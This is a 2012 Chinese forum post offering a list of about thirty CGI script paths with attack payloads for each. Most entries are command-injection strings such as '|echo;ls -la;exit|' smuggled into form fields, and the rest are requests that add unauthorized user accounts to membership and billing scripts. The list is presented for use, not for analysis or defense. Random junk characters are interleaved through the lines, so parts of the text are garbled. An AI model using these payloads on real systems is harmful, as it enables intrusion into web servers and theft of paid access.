找回密码
 立即注册
查看: 2897|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
( F2 Q1 j3 r3 p& G, u! g) s3 p, ~. S! {, h( F# s1 m
/smspass.pl
/ ~3 k1 B$ [! \& w# Kusername=username&password=password  Q. H; O( @. D

' F2 n$ Q; @$ e( w" r/index.cgi
6 Q) H$ k6 q$ dwei=ren&gen=command
4 ?" @3 T; f; z2 V5 ]
* T* @1 x. _, x4 v4 ^/passmaster.cgi+ r4 m/ v* v& Z5 ?& q3 V
Action=Add&Username=Username&Password=Password! y! U! j  O5 L6 X6 l2 r

- l" A; r0 d5 b  |: t1 F* F  v6 a/accountcreate.cgi5 d5 `  Z# D9 H
username=username&password=password&ref1=|echo;ls|
0 D. i  Z  |4 ^" O& Q6 ?: l
! {5 D* b1 l, B' r3 t$ q/form.cgi
, r, i! h3 G% k% v# Oname=xxxx&email=email&subject=xxxx&response=|echo;ls|
! u% B$ V9 X1 m2 g9 V1 |
! m( w  F9 c% `9 T* R( I! h/addusr.pl& }' D8 Z% Z( L$ x! s- v
/cgi-bin/EuroDebit/addusr.pl4 s: D9 z/ Y0 ]2 `8 |, H6 Q
user=username&pass=Password&confirm=Password0 b: F0 Z# I6 d. z+ \# y

8 l) O. S7 t9 N/ t- {7 O% [/ccbill-local.asp" k# m) z) ^0 M+ }& A5 V9 H
post_values=username:password1 l2 w# n5 }& u5 P
, ^& k% s, m' l1 S2 `; M+ G
/count.cgi3 ^1 c  w% I' ]
pinfile=|echo;ls -la;exit|. V% i" G* ?% l2 |: i/ ^+ s+ [
) r7 C( \  y* p$ {
/recon.cgi
* M/ s& m- a0 }# |* X9 p/recon.cgi?search/ @+ M$ n5 u4 S5 ?: b4 b* n
searchoption=1&searchfor=|echo;ls -al;exit|
. K7 z2 w5 s0 D1 n9 f1 d$ O% h& C# g
/verotelrum.pl4 V% i. Y, K* J0 Y. d7 X7 Z' P
vercode=username:password:dseegsow:add:amount<&30>
2 V: j- X/ e$ L: Y# [0 b; v5 z, O" K& K, ?* L' [4 s1 H4 S% s
/af.cgi1 H& m) M* k. h' h; \- V) K
_browser_out=|echo;ls -la;exit;|6 r5 x) ^- Y. A! k! ^0 s: w
) ~; P: z5 \8 f' y' N7 R8 |
/modify.cgi
3 R4 D9 a& k4 K9 `) w+ D$ ousername=username&password=password&expire=30. m" G: b; U( e0 a" w

  S' O3 U- @+ D( ]/openjournal.cgi
% R0 {8 w+ q4 iedit=1&ct=2&go=|echo;ls -al;exit|1 H) l6 W0 ?2 @. i) f  w. b3 H6 ]) H

  o8 E$ D4 |5 D1 X! @" E# @/gx9passwd.cgi3 ?# \: U9 Z; \2 D. @6 n" |
cmd=ADD&user=username&pass=password
( E. |  n& Y( a$ s# T6 E: c! b7 E: r7 I5 T+ q1 K
/probecontrol.cgi
4 f3 i# g1 S/ l9 rcommand=enable&username=username&password=password
8 d. ?8 M) x7 F: J. X3 U# E  O7 U2 B; x' h2 W+ ^. Z6 ^, w0 ?6 z+ B/ A
/recon.cgi
# Z. W" t; d% k1 Z- v+ w5 asearchoption=3&searchfor=echo;ls -la;exit4 u5 s6 u# y; ^1 X- _. U+ i
+ R6 x9 |6 F5 A% m$ P  t; P" t& O) {/ |
/htadd.pl+ e5 X- |9 R& X: M
configfile=|echo; ls -alt; exit& k. u3 C; t9 Z2 o4 C' o! z. K* q, g

1 u- n' a$ U( G+ ?/gx9passwd.cgi
8 @, O( u, f7 v. H& lcmd=ADD&user=username&pass=password
( T& |2 n/ S7 {$ l' u! a
5 r) ~% c* D6 e0 e6 ^) f/ibill*.pl" V2 P; M4 {( {0 M5 b3 t
reqtype=add&authpwd=authpwd&username=username&password=password! M8 u, z5 o( Z' J

8 y  B1 f4 [0 J9 K* U/cpay.cgi
9 x. w6 P2 u9 M, V) Z' _9 rcommand=add_member&username=username(EMAIL)&password=password(DES)
: G' N2 Y- T5 ^' C, f! z# \- J6 ?2 m3 N1 y* c: v5 g6 p5 r  W
/globill_ut.cgi7 L; ]* P8 x( B, ?
do=add&username=username&password=password&wpassword=password
9 R, a) F3 l' A" b
/ _  r  J) U2 C/usercontrol.cgi
0 A) G4 f5 y) v+ I) s1 y" M- Y9 W. bcommand=enable&username=USER&password=PASS
; I+ J! z+ s; ?5 Q; A8 \- _5 O3 R9 h1 P8 m" ~; \
/globoSALErum.cgi( E! F6 z! u$ f& X9 W
action=ADD&seccode=seccode&login=username&password=password$ `! j; _- O1 d
1 T  L; d+ u$ ^7 h0 l% N9 J
/addusr.pl
5 o+ K* m7 k3 muser=USER&pass=PASS&confirm=PASS
8 B1 C' v0 O* R/ Y. K4 o* n* S) n; H1 B7 X" C* R+ T3 Z
/pincount.cgi( I- V( V4 S% C0 X! ^7 m
/cgi-bin/mastergate/pincount.cgi
; x# Q) V8 |# S! D$ y8 apinfile=|echo;pwd;exit|( {- N5 I) }8 d5 I$ U% h
+ O3 D0 P; N3 e4 O
/accountcreate.cgi
9 j  P  Q$ ?* `& R( c/cgi-bin/gateway/accountcreate.cgi
! _, \$ m2 C6 C$ v7 r/ \4 m+ Busername=username&password=password&password2=password&ref1=|echo;ls -al;exit5 ^+ b' n5 d  x( J  f; M( P
) ^+ [/ b: f) K4 o5 w& k# H; \; g
/af.cgi
8 ~9 z0 d5 k  E3 ~( F1 \/env.cgi3 _; Y, E; s" \" L& A
ADD+;echo;pwd;exit
# @* [; M! J2 Q; F# }0 x5 Y5 m/ i2 a" Y
/count.cgi
. E4 T0 N% G1 E' j& ipinfile=|echo;pwd;exit|
4 g) X/ P4 k1 t; J. G! x' c8 b! ?- P1 c
/recon.cgi
6 R* v8 v7 n- c# C) ^1 z3 lsearchoption=1&searchfor=|echo;ls%20-al;exit|1 ^( W6 H; N$ X4 S
5 p  ]2 R  D2 @8 B+ Z& E' H0 Y5 p
/add.cgi
8 _0 `( g  l6 O. g; {6 w2 j1 Rusername=username&password=password&expire=309 }2 z; x0 C6 J6 s. h" U& _
: ^0 y  m9 |7 e) j/ U- _% L
==============================. Z# ^# c! O1 U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表